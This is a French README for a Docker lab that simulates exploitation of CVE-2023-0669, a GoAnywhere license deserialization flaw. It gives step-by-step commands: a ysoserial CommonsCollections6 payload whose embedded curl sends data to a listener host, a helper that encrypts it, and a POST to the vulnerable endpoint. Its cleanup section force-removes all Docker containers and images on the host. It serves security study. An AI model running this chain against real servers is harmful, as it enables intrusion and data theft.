
Environnement de simulation pour CVE-2023-0669 avec un attaquant basé sur Docker, un serveur vulnérable et des conteneurs d'écoute. Démontre la génération d'exploit par désérialisation, le chiffrement de la charge utile et l'exfiltration de données.
cve-2023-0669-simulation/ ├── docker-compose.yml ├── attacker/ │ ├── Dockerfile │ └── CVE_2023_0669_helper.java ├── vulnerable/ │ ├── Dockerfile │ └── VulnerableServer.java ├── listener/ │ ├── Dockerfile │ └── server.py └── received/ ← créé automatiquement (exfiltration)
docker-compose up --build
KeyError: 'ContainerConfig' lors de docker compose upce projet requiert :
docker compose down --remove-orphans
docker rm -f $(docker ps -aq)
docker rmi -f $(docker images -q)
Puis reconstruisez proprement :
docker compose build --no-cache
docker compose up
docker exec -it attacker bash
java -jar ysoserial-all.jar CommonsCollections6 'curl -s http://listener:8080/receive -d "PWNED-CVE-2023-0669-simulation-$(date)"' > payload.ser
java CVE_2023_0669_helper payload.ser 1
curl -X POST http://vulnerable:8001/goanywhere/lic/accept
-d "encryptedLicenseResponseData=LA_CHAÎNE_BASE64_ICI"
-d "acceptLicense=true"
Tu verras dans les logs du listener (ou dans le dossier ./received sur ton PC) :
PWNED ! Reçu 42 bytes → PWNED-CVE-2023-0669-simulation-Sat 06 Dec 2025...